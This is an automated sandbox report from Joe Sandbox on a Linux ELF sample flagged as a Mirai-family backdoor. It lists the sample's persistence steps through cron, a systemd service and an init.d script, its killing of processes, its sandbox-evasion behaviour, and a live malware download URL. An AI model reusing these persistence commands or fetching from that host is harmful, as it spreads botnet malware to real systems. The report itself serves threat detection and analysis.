Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
5.elf

Overview

General Information

Sample name:5.elf
Analysis ID:1589452
MD5:acf8c6201a22aa0c7c0751252ab9ae39
SHA1:6de61f4a111b08628b671480a7dc59cfbeeaed4b
SHA256:2310571a157978b46838410517b66b6a45f8ab5c2846fc15ac9c93168ca80dd9
Tags:elfuser-abuse_ch
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Drops files in suspicious directories
Executes the "crontab" command typically for achieving persistence
Sample tries to kill multiple processes (SIGKILL)
Sample tries to persist itself using cron
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "systemctl" command used for controlling the systemd system and service manager
Reads system information from the proc file system
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sleeps for long times indicative of sandbox evasion
Uses the "uname" system call to query kernel version information (possible evasion)
Writes shell script file to disk with an unusual file extension

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1589452
Start date and time:2025-01-12 15:39:17 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 19s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:5.elf
Detection:MAL
Classification:mal64.spre.troj.evad.linELF@0/6@0/0
  • Skipping network analysis since amount of network traffic is too extensive
  • VT rate limit hit for: http://103.136.41.100/5
Command:/tmp/5.elf
PID:5831
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
gosh that chinese family at the other table sure ate a lot
Standard Error:
  • system is lnxubuntu20
  • 5.elf (PID: 5831, Parent: 5755, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/5.elf
    • 5.elf New Fork (PID: 5842, Parent: 5831)
    • sh (PID: 5842, Parent: 5831, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload > /dev/null 2>&1"
      • sh New Fork (PID: 5848, Parent: 5842)
      • systemctl (PID: 5848, Parent: 5842, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
    • 5.elf New Fork (PID: 5852, Parent: 5831)
    • sh (PID: 5852, Parent: 5831, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl start hello.service > /dev/null 2>&1"
      • sh New Fork (PID: 5857, Parent: 5852)
      • systemctl (PID: 5857, Parent: 5852, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start hello.service
    • 5.elf New Fork (PID: 5858, Parent: 5831)
    • sh (PID: 5858, Parent: 5831, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab /tmp/crontab.tmp > /dev/null 2>&1"
      • sh New Fork (PID: 5863, Parent: 5858)
      • crontab (PID: 5863, Parent: 5858, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab /tmp/crontab.tmp
    • 5.elf New Fork (PID: 5864, Parent: 5831)
    • sh (PID: 5864, Parent: 5831, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/etc/init.d/hello > /dev/null 2>&1"
      • sh New Fork (PID: 5869, Parent: 5864)
    • 5.elf New Fork (PID: 5872, Parent: 5831)
      • 5.elf New Fork (PID: 5874, Parent: 5872)
        • 5.elf New Fork (PID: 5876, Parent: 5874)
        • 5.elf New Fork (PID: 5881, Parent: 5874)
        • 5.elf New Fork (PID: 5883, Parent: 5874)
        • 5.elf New Fork (PID: 5884, Parent: 5874)
        • 5.elf New Fork (PID: 5919, Parent: 5874)
          • 5.elf New Fork (PID: 5921, Parent: 5919)
  • wrapper-2.0 (PID: 5833, Parent: 3235, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
  • wrapper-2.0 (PID: 5834, Parent: 3235, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
  • wrapper-2.0 (PID: 5835, Parent: 3235, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
  • wrapper-2.0 (PID: 5836, Parent: 3235, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
  • wrapper-2.0 (PID: 5837, Parent: 3235, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
  • wrapper-2.0 (PID: 5838, Parent: 3235, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
  • systemd New Fork (PID: 5850, Parent: 5849)
  • snapd-env-generator (PID: 5850, Parent: 5849, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: 5.elfVirustotal: Detection: 36%Perma Link
Source: 5.elfReversingLabs: Detection: 44%
Source: /tmp/5.elf (PID: 5831)Socket: 127.0.0.1:23476Jump to behavior
Source: 5.elfString found in binary or memory: http://%d.%d.%d.%d/%s
Source: 5.elf, 5831.1.00007f1fec036000.00007f1fec03c000.rw-.sdmp, 5.elf, 5872.1.00007f1fec036000.00007f1fec03c000.rw-.sdmp, 5.elf, 5919.1.00007f1fec036000.00007f1fec03c000.rw-.sdmp, 5.elf, 5921.1.00007f1fec036000.00007f1fec03c000.rw-.sdmpString found in binary or memory: http://1/wget.sh
Source: hello.service.12.dr, hello.12.dr, tmp.hsDAfy.38.dr, crontab.tmp.12.drString found in binary or memory: http://103.136.41.100/5
Source: 5.elf, 5831.1.00007f1fec036000.00007f1fec03c000.rw-.sdmp, 5.elf, 5872.1.00007f1fec036000.00007f1fec03c000.rw-.sdmp, 5.elf, 5919.1.00007f1fec036000.00007f1fec03c000.rw-.sdmp, 5.elf, 5921.1.00007f1fec036000.00007f1fec03c000.rw-.sdmpString found in binary or memory: http://9/curl.sh
Source: 5.elf, 5831.1.00007f1fec036000.00007f1fec03c000.rw-.sdmp, 5.elf, 5872.1.00007f1fec036000.00007f1fec03c000.rw-.sdmp, 5.elf, 5919.1.00007f1fec036000.00007f1fec03c000.rw-.sdmp, 5.elf, 5921.1.00007f1fec036000.00007f1fec03c000.rw-.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 5.elf, 5831.1.00007f1fec036000.00007f1fec03c000.rw-.sdmp, 5.elf, 5872.1.00007f1fec036000.00007f1fec03c000.rw-.sdmp, 5.elf, 5919.1.00007f1fec036000.00007f1fec03c000.rw-.sdmp, 5.elf, 5921.1.00007f1fec036000.00007f1fec03c000.rw-.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

System Summary

barindex
Source: /tmp/5.elf (PID: 5831)SIGKILL sent: pid: 3192, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5831)SIGKILL sent: pid: 3249, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5831)SIGKILL sent: pid: 3250, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5831)SIGKILL sent: pid: 3251, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5831)SIGKILL sent: pid: 3252, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5831)SIGKILL sent: pid: 3253, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5831)SIGKILL sent: pid: 3255, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5831)SIGKILL sent: pid: 3272, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5831)SIGKILL sent: pid: 3274, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5831)SIGKILL sent: pid: 5833, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5831)SIGKILL sent: pid: 5834, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5831)SIGKILL sent: pid: 5835, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5831)SIGKILL sent: pid: 5836, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5831)SIGKILL sent: pid: 5837, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5831)SIGKILL sent: pid: 5838, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5921)SIGKILL sent: pid: 5919, result: successfulJump to behavior
Source: ELF static info symbol of initial sample.symtab present: no
Source: /tmp/5.elf (PID: 5831)SIGKILL sent: pid: 3192, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5831)SIGKILL sent: pid: 3249, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5831)SIGKILL sent: pid: 3250, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5831)SIGKILL sent: pid: 3251, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5831)SIGKILL sent: pid: 3252, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5831)SIGKILL sent: pid: 3253, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5831)SIGKILL sent: pid: 3255, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5831)SIGKILL sent: pid: 3272, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5831)SIGKILL sent: pid: 3274, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5831)SIGKILL sent: pid: 5833, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5831)SIGKILL sent: pid: 5834, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5831)SIGKILL sent: pid: 5835, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5831)SIGKILL sent: pid: 5836, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5831)SIGKILL sent: pid: 5837, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5831)SIGKILL sent: pid: 5838, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5921)SIGKILL sent: pid: 5919, result: successfulJump to behavior
Source: classification engineClassification label: mal64.spre.troj.evad.linELF@0/6@0/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 5863)Crontab executable: /usr/bin/crontab -> crontab /tmp/crontab.tmpJump to behavior
Source: /usr/bin/crontab (PID: 5863)File: /var/spool/cron/crontabs/tmp.hsDAfyJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/4056/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/4056/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/4056/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/4056/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/3241/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/3241/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/3241/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/3241/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/3241/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/3483/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/3483/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/3483/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/3483/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/5816/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/5816/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/5816/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/5816/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1732/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1732/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1732/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1732/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1732/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1730/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1730/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1730/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1730/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1730/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1333/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1333/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1333/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1333/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1333/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1695/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1695/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1695/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1695/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1695/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/3235/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/3235/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/3235/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/3235/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/3235/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/3234/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/3234/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/3234/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/3234/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/3234/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1617/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1617/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1617/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1617/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1617/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1615/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1615/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1615/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1615/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1615/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/5815/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/5815/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/5815/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/5815/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/5672/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/5672/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/5672/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/5672/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1591/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1591/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1591/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1591/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1591/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1623/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1623/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1623/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1623/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1623/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/764/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/764/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/764/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/764/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/764/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/3368/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/3368/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/3368/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/3368/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/3368/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1585/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1585/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1585/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1585/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5884)File opened: /proc/1585/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5842)Shell command executed: sh -c "systemctl daemon-reload > /dev/null 2>&1"Jump to behavior
Source: /tmp/5.elf (PID: 5852)Shell command executed: sh -c "systemctl start hello.service > /dev/null 2>&1"Jump to behavior
Source: /tmp/5.elf (PID: 5858)Shell command executed: sh -c "crontab /tmp/crontab.tmp > /dev/null 2>&1"Jump to behavior
Source: /tmp/5.elf (PID: 5864)Shell command executed: sh -c "/etc/init.d/hello > /dev/null 2>&1"Jump to behavior
Source: /bin/sh (PID: 5848)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
Source: /bin/sh (PID: 5857)Systemctl executable: /usr/bin/systemctl -> systemctl start hello.serviceJump to behavior
Source: /tmp/5.elf (PID: 5831)Reads from proc file: /proc/statJump to behavior
Source: /tmp/5.elf (PID: 5831)Writes shell script file to disk with an unusual file extension: /etc/init.d/helloJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: /tmp/5.elf (PID: 5831)File: /etc/init.d/helloJump to dropped file
Source: /tmp/5.elf (PID: 5921)Sleeps longer then 60s: 60.0sJump to behavior
Source: /tmp/5.elf (PID: 5831)Queries kernel information via 'uname': Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5833)Queries kernel information via 'uname': Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5834)Queries kernel information via 'uname': Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5836)Queries kernel information via 'uname': Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5837)Queries kernel information via 'uname': Jump to behavior
Source: 5.elf, 5831.1.000055b0c2338000.000055b0c2489000.rw-.sdmp, 5.elf, 5872.1.000055b0c2338000.000055b0c2489000.rw-.sdmp, 5.elf, 5919.1.000055b0c2338000.000055b0c2489000.rw-.sdmp, 5.elf, 5921.1.000055b0c2338000.000055b0c2489000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
Source: 5.elf, 5831.1.00007fffe5b2c000.00007fffe5b4d000.rw-.sdmp, 5.elf, 5872.1.00007fffe5b2c000.00007fffe5b4d000.rw-.sdmp, 5.elf, 5919.1.00007fffe5b2c000.00007fffe5b4d000.rw-.sdmp, 5.elf, 5921.1.00007fffe5b2c000.00007fffe5b4d000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/5.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/5.elf
Source: 5.elf, 5831.1.00007fffe5b2c000.00007fffe5b4d000.rw-.sdmpBinary or memory string: /tmp/qemu-open.2WtFN5
Source: 5.elf, 5831.1.00007fffe5b2c000.00007fffe5b4d000.rw-.sdmpBinary or memory string: U/tmp/qemu-open.2WtFN5:
Source: 5.elf, 5831.1.000055b0c2338000.000055b0c2489000.rw-.sdmp, 5.elf, 5872.1.000055b0c2338000.000055b0c2489000.rw-.sdmp, 5.elf, 5919.1.000055b0c2338000.000055b0c2489000.rw-.sdmp, 5.elf, 5921.1.000055b0c2338000.000055b0c2489000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: 5.elf, 5831.1.00007fffe5b2c000.00007fffe5b4d000.rw-.sdmp, 5.elf, 5872.1.00007fffe5b2c000.00007fffe5b4d000.rw-.sdmp, 5.elf, 5919.1.00007fffe5b2c000.00007fffe5b4d000.rw-.sdmp, 5.elf, 5921.1.00007fffe5b2c000.00007fffe5b4d000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts1
Scheduled Task/Job
1
Systemd Service
1
Systemd Service
1
Masquerading
1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network Medium1
Service Stop
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scheduled Task/Job
1
Scheduled Task/Job
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Scripting
Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager1
System Information Discovery
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1589452 Sample: 5.elf Startdate: 12/01/2025 Architecture: LINUX Score: 64 56 Multi AV Scanner detection for submitted file 2->56 9 5.elf 2->9         started        13 xfce4-panel wrapper-2.0 2->13         started        15 xfce4-panel wrapper-2.0 2->15         started        17 5 other processes 2->17 process3 file4 50 /tmp/crontab.tmp, troff 9->50 dropped 52 /etc/init.d/hello, Bourne-Again 9->52 dropped 58 Sample tries to kill multiple processes (SIGKILL) 9->58 60 Drops files in suspicious directories 9->60 19 5.elf sh 9->19         started        21 5.elf 9->21         started        23 5.elf sh 9->23         started        25 2 other processes 9->25 signatures5 process6 process7 27 sh crontab 19->27         started        31 5.elf 21->31         started        33 sh systemctl 23->33         started        35 sh systemctl 25->35         started        37 sh 25->37         started        file8 54 /var/spool/cron/crontabs/tmp.hsDAfy, troff 27->54 dropped 62 Sample tries to persist itself using cron 27->62 64 Executes the "crontab" command typically for achieving persistence 27->64 39 5.elf 31->39         started        41 5.elf 31->41         started        43 5.elf 31->43         started        45 2 other processes 31->45 signatures9 process10 process11 47 5.elf 39->47         started        signatures12 66 Sample tries to kill multiple processes (SIGKILL) 47->66

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
5.elf37%VirustotalBrowse
5.elf45%ReversingLabsLinux.Backdoor.Mirai
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://103.136.41.100/5100%Avira URL Cloudmalware
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://%d.%d.%d.%d/%s5.elffalse
    high
    http://1/wget.sh5.elf, 5831.1.00007f1fec036000.00007f1fec03c000.rw-.sdmp, 5.elf, 5872.1.00007f1fec036000.00007f1fec03c000.rw-.sdmp, 5.elf, 5919.1.00007f1fec036000.00007f1fec03c000.rw-.sdmp, 5.elf, 5921.1.00007f1fec036000.00007f1fec03c000.rw-.sdmpfalse
      high
      http://103.136.41.100/5hello.service.12.dr, hello.12.dr, tmp.hsDAfy.38.dr, crontab.tmp.12.drfalse
      • Avira URL Cloud: malware
      unknown
      http://schemas.xmlsoap.org/soap/encoding/5.elf, 5831.1.00007f1fec036000.00007f1fec03c000.rw-.sdmp, 5.elf, 5872.1.00007f1fec036000.00007f1fec03c000.rw-.sdmp, 5.elf, 5919.1.00007f1fec036000.00007f1fec03c000.rw-.sdmp, 5.elf, 5921.1.00007f1fec036000.00007f1fec03c000.rw-.sdmpfalse
        high
        http://9/curl.sh5.elf, 5831.1.00007f1fec036000.00007f1fec03c000.rw-.sdmp, 5.elf, 5872.1.00007f1fec036000.00007f1fec03c000.rw-.sdmp, 5.elf, 5919.1.00007f1fec036000.00007f1fec03c000.rw-.sdmp, 5.elf, 5921.1.00007f1fec036000.00007f1fec03c000.rw-.sdmpfalse
          high
          http://schemas.xmlsoap.org/soap/envelope/5.elf, 5831.1.00007f1fec036000.00007f1fec03c000.rw-.sdmp, 5.elf, 5872.1.00007f1fec036000.00007f1fec03c000.rw-.sdmp, 5.elf, 5919.1.00007f1fec036000.00007f1fec03c000.rw-.sdmp, 5.elf, 5921.1.00007f1fec036000.00007f1fec03c000.rw-.sdmpfalse
            high
            No contacted IP infos
            No context
            No context
            No context
            No context
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            /etc/init.d/hello5.elfGet hashmaliciousUnknownBrowse
              5.elfGet hashmaliciousUnknownBrowse
                Process:/tmp/5.elf
                File Type:Bourne-Again shell script, ASCII text executable
                Category:dropped
                Size (bytes):612
                Entropy (8bit):4.719671389487418
                Encrypted:false
                SSDEEP:12:i5BpMp5kTMp5Gu+a6OqowXQeCMG259srxylKNVUdURucTyl:ifpMr8MrPd6OqownCMGAsrxy8bp4
                MD5:E3BD05E519AE4C55DEE559787A9BD288
                SHA1:17A0A755C7CAA7B5761FFCF460A10D647080A25D
                SHA-256:874AADE8781ED56668F60DA88D91B6816F90601CF9018FF277D0A4AD599B4C59
